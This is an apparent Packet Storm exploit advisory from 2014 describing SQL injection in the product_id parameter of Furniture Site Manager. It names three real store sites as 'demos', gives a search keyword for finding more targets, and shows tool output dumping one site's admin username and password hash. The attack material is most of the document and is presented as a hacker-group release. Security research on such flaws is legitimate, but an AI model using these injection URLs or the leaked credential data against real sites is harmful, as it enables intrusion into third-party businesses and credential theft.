Furniture Site Manager SQL Injection

2014-08-27T00:00:00
ID PACKETSTORM:128020
Type packetstorm
Reporter KnocKout
Modified 2014-08-27T00:00:00

Description

                                        
                                            `Furniture Site Manager => Remote (product_id) SQL Injection Vulnerability  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockout@e-mail.com.tr (onlymail)  
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org   
[~] GREETZ : DaiMon,BARCOD3_UnDeRTaKeR_   
[Say]: Görmeyeli nasýlsýnýz beyler? xoron hala buralarý takip ettiðine eminim. arada bir selam ver geç buralara özletme :)  
{çýtýrdan geri döndük biline...}  
{THE H4X0RE SECURITY PROJECT continues!! ] (Turkey]  
  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : Furniture Site Manager  
|~Price : N/A  
|~Software: https://www.balcom-vetillo.com/furniture-site-manager/ - https://www.furnituresitemanager.com/  
|~Vulnerability Style : SQL Injection  
|~Vulnerability Dir : /  
|~Keyword : "Powered By Furniture Site Manager"  
|[~]Date : "27.AG.2014"  
|[~]Tested on : (L):Kali Linux, Windows XP (R):Apache, PHP 5.4.31, MySQL 5  
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Demos:   
http://finestfurniture.com/index.php?route=product/product&path=69&product_id=29880' AAAAAAAAAAAAAAA  
http://lakeknoxvillefurnitureco.com/index.php?route=product/product&product_id=36398' AAAAAAAAAAAAAAAA  
http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' AAAAAAAAAAAAAAAA  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
===============================================================  
|{~~~~~~~~ Explotation| SQL Injection~~~~~~~~~~~}|  
  
http://$Site/$path/index.php?route=product/product&path=[true ID]&product_id=[true ID]' {SQL Injection}  
http://$Site/$path/index.php?route=product/product&product_id=[true ID]' {SQL INJECTÝON}  
  
Ex; http://curlysfurniture.com  
[~] SQL Injecting..  
  
http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' //SQL Command  
the console   
...  
[20:56:26] [INFO] fetching columns 'user_id=1, password, username' for table 'oc_user' in database 'curlysfurniture'  
[20:56:26] [INFO] the SQL query used returns 2 entries  
[20:56:26] [INFO] resumed: username  
[20:56:26] [INFO] resumed: varchar(20)  
[20:56:26] [INFO] resumed: password  
[20:56:26] [INFO] resumed: varchar(40)  
[20:56:26] [INFO] fetching entries of column(s) 'password, username' for table 'oc_user' in database 'curlysfurniture'  
[20:56:26] [INFO] the SQL query used returns 1 entries  
[20:56:26] [INFO] resumed: 749ec92d59aada28cd05de30b8e23aef92b8221c  
[20:56:26] [INFO] resumed: admin  
...  
...  
...  
=============================================================  
goodluck. greetz TURKEY  
`